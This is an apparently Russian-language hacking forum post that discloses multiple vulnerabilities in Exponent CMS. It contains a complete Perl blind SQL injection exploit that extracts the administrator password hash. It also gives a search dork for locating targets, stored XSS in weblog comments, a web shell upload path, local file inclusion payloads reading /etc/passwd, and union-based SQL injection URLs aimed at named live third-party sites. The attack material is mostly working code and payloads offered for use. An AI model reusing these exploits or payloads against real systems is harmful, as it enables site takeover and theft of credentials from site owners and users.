Exponent CMS Site: http://exponentcms.org Dork: "Provided by OIC Group Inc" id Version: Latest -- 0.97 Code: default prefix: exponent_ user table: user auth columns: username,password Hash: md5($pass) Remote SQL Injection: Bulletin Board by OIC Group, IncVuln code: /view_thread.php PHP: .... if (!defined("EXPONENT")) exit(""); $bb = null; $post = null; $post = $db->selectObject("bb_post","id=".$_GET['id']); # Видим, второе поле учавствует в запросе ниже. if ($post && $post->parent != 0) $post = $db->selectObject("bb_post","id=".$post->parent); .... ... PHP: .... function selectObjects($table, $where = null,$orderby = null) { if ($where == null) $where = "1"; if ($orderby == null) $orderby = ''; else $orderby = "ORDER BY " . $orderby; $res = @mysqli_query($this->connection, "SELECT * FROM `" . $this->prefix . "$table` WHERE $where $orderby"); if ($res == null) return array(); $objects = array(); for ($i = 0; $i < mysqli_num_rows($res); $i++) $objects[] = mysqli_fetch_object($res); return $objects; } .... Составив эксплоит с вложенным во второе поле запросом, все же, вывода я не нашел. Забираем данные посимвольно. Exploit: Code: #!/usr/bin/perl use strict; use LWP::Simple; &usage; my $host = shift; my $id = shift; $|=1; my $n=48; my $i =1; my $loop = 1; my ($content,$result) = undef; my $request = 0; print "Administrator hash: "; while($loop) { $content = get($host.'/bbmodule/view_thread/id/'.$id.'+and+if(ascii(upper(substring((select+password+from+exponent_user+where+id=1),'.$i.',1)))='.$n.',1,0)'); if($content =~ /Posted on/) {print $result=chr($n); $n=47; $i++;} elsif($i==33) {$loop = 0} else {$n++; if($n==58){$n=65} } $request++; } print "\nREQUEST: ".$request; sub usage { print q { ################################################################# Exponent Bulletin Board Blind SQL Injection Exploit (id) Author: ZAMUT Vuln: id= Homepage: http://antichat.ru Usage: expon.pl [Server] [Valid Id] Example: perl expon.pl http://bla.ru 2 ################################################################# }; } Active XSS: Module Weblog / Online JournalПри оставлении комментария уязвимо поле "Name" Vuln code: /comment_save.php PHP: if (isset($comment->id)) { $comment->editor = $user->id; $comment->edited = time(); $db->updateObject($comment,'weblog_comment'); } else { $comment->posted = time(); if (isset($user) && $user->id != 0) { $comment->poster = $user->id; $comment->name = $user->username; } elseif (isset($_POST['name'])) { $comment->name = $_POST['name']; } else { $comment->name = 'Anonymous'; } $comment->parent_id = intval($_POST['parent_id']); $db->insertObject($comment,'weblog_comment'); } ... /postgres.php PHP: function insertObject($object,$table) { $sql = "INSERT INTO " . $this->prefix.$table . " ("; $values = ") VALUES ("; foreach (get_object_vars($object) as $var=>$val) { $sql .= "$var,"; $values .= "'".str_replace("'","\\'",$val)."',"; } if (pg_query($this->connection,substr($sql,0,-1).substr($values,0,-1) . ")") !== false) { $sql = "SELECT last_value FROM " . $this->prefix.$table ."_id_seq"; $res = @pg_query($this->connection,$sql); if ($res) { $o = pg_fetch_object($res); pg_free_result($res); return $o->last_value; } else return 0; } else return 0; } Shell: Manage Files => Upload => shell.phtml Code: http://localhost/exp/files/[COLOR=Green]shell.phtml[/COLOR] В /files лежит .htaccess: Code: # secure directory by disabling script execution AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi Options -ExecCGI Download P.S. Уязвимые модули, идут c CMS по дефолту. (c) ZAMUT
index.php PHP: ... $page = exponent_theme_getTheme(); // If we are in a printer friendly request then we need to change to our printer friendly subtheme if (PRINTER_FRIENDLY == 1) { exponent_sessions_set("uilevel",0); $pftheme = exponent_theme_getPrinterFriendlyTheme(); // get the printer friendly theme $page = $pftheme == null ? $page : $pftheme; // if there was no theme found then just use the current subtheme } $base_i18n = exponent_lang_loadFile('index.php'); if (is_readable($page)) { if (!exponent_javascript_inAjaxAction()) { include_once($page); themes/coolwatertheme/index.php PHP: <?php exponent_theme_main(); ?> subsystems/theme.php PHP: function exponent_theme_main() { global $db, $user; echo show_msg_queue(); if ((!defined("SOURCE_SELECTOR") || SOURCE_SELECTOR == 1) && (!defined("CONTENT_SELECTOR") || CONTENT_SELECTOR == 1)) { $last_section = exponent_sessions_get("last_section"); $section = $db->selectObject("section","id=".$last_section); // View authorization will be taken care of by the runAction and mainContainer functions if (exponent_theme_inAction()) { exponent_theme_runAction(); function exponent_theme_runAction() { if (exponent_theme_inAction()) { if (!AUTHORIZED_SECTION) { echo SITE_403_HTML; // return; } if (exponent_sessions_isset("themeopt_override")) { $config = exponent_sessions_get("themeopt_override"); echo "<a class='mngmntlink sitetemplate_mngmntlink' href='".$config['mainpage']."'>".$config['backlinktext']."</a><br /><br />"; } if (isset($_REQUEST['controller'])) { echo renderAction($_REQUEST); } else { if ($_REQUEST['action'] == 'index') { $view = empty($_REQUEST['view']) ? 'Default' : $_REQUEST['view']; $title = empty($_REQUEST['title']) ? '' : $_REQUEST['title']; $src = empty($_REQUEST['src']) ? null : $_REQUEST['src']; exponent_theme_showModule($_REQUEST['module'], $view, $title, $src); return true; } global $db, $user; $loc = null; $loc->mod = $_REQUEST['module']; $loc->src = (isset($_REQUEST['src']) ? $_REQUEST['src'] : ""); $loc->int = (isset($_REQUEST['int']) ? $_REQUEST['int'] : ""); $actfile = "/" . $_REQUEST['module'] . "/actions/" . $_REQUEST['action'] . ".php"; if (isset($_REQUEST['_common'])) $actfile = "/common/actions/" . $_REQUEST['action'] . ".php"; if (is_readable(BASE."themes/".DISPLAY_THEME_REAL."/modules".$actfile)) { include_once(BASE."themes/".DISPLAY_THEME_REAL."/modules".$actfile); } elseif (is_readable(BASE.'modules/'.$actfile)) { include_once(BASE.'modules/'.$actfile); LFI mq=off http://localhost/?action=../../../../../../../../boot.ini%00&module=loginmodule http://localhost/?action=login&module=../../../../../../../../boot.ini%00 http://demo.demolabo.com/exponent/en/?action=../../../../../../../../../../../etc/passwd%00&module=loginmodule --------------- modules/articlemodule/actions/view_article.php PHP: if (!defined("EXPONENT")) exit(""); $article = null; if (isset($_GET['id'])) { $article = $db->selectObject("article","id=".$_GET['id']); subsystems/database/mysqli.php PHP: function selectObjects($table, $where = null,$orderby = null) { if ($where == null) $where = "1"; if ($orderby == null) $orderby = ''; else $orderby = "ORDER BY " . $orderby; $res = @mysqli_query($this->connection, "SELECT * FROM `" . $this->prefix . "$table` WHERE $where $orderby"); if ($res == null) return array(); $objects = array(); for ($i = 0; $i < mysqli_num_rows($res); $i++) $objects[] = mysqli_fetch_object($res); return $objects; } SQL http://localhost/index.php?action=view_article&module=articlemodule&id=-1+union+select+1,2,3,version(),user(),6+--+ http://www.exponentcms.org/index.php?action=view_article&module=articlemodule&id=-1+union+select+1,2,3,version(),user(),6+--+ (на exponentcms.org оперативно закрыли sql, сначала выдавали надпись, типа - уходи хакер, потом сменили на bad query! Поэтому ниже еще один УРЛ для проверки.) http://rickandbernie.net/?action=view_article&module=articlemodule&id=-1+union+select+1,2,3,version(),user(),6+--+ ---------------- modules/imagegallerymodule/actions/image_to_panel.php PHP: if (!defined("EXPONENT")) exit(""); $image = null; if (isset($_GET['id'])) { $image = $db->selectObject("imagegallery_image","id=".$_GET['id']); } if ($image) { $image->file = $db->selectObject("file","id=".$image->file_id); echo json_encode($image); } else { echo SITE_404_HTML; } SQL http://localhost/index.php?action=image_to_panel&module=imagegallerymodule&id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11+--+
